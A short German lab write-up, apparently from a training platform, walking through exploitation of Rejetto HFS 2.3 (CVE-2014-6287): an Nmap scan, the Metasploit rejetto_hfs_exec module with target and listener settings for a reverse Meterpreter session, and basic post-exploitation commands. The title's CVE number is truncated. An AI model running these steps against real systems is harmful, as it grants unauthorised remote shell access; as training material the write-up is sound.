
Metasploit RCE auf HFS 2.3 - CVE-2014-62
Metasploit RCE auf HFS 2.3 - CVE-2014-62
🔖 Titel des Projekts
> Remote Code Execution über HTTP File Server (HFS 2.3)
⚙ Verwendete Tools • Kali Linux • Nmap • Metasploit • Ziel: HFS 2.3 auf Windows 7
🔐 Schwachstellen-Details • Name: CVE-2014-6287 • Typ: Remote Code Execution • Ursache: Nicht validierte Eingabe im HFS-Skripting • Auswirkung: Nicht authentifizierter Shell-Zugriff
🔍 Methodik (Schritt für Schritt)
🔹 Schritt 1: Informationssammlung (Nmap)
• nmap -sV demo.ine.local (IP des Ziels)
• offener Port gefunden: 80
• Dienst: rejetto HTTP file server 2.3

🔹 Schritt 2: Ausnutzung (Metasploit)
• Msfconsole
• Suche nach HFS oder rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
Exploit
🔹 Schritt 3: Post-Exploitation
Nach dem Ausführen erhältst du eine Meterpreter-Sitzung Verwende den Befehl: shell
• whoami • ipconfig • dir

**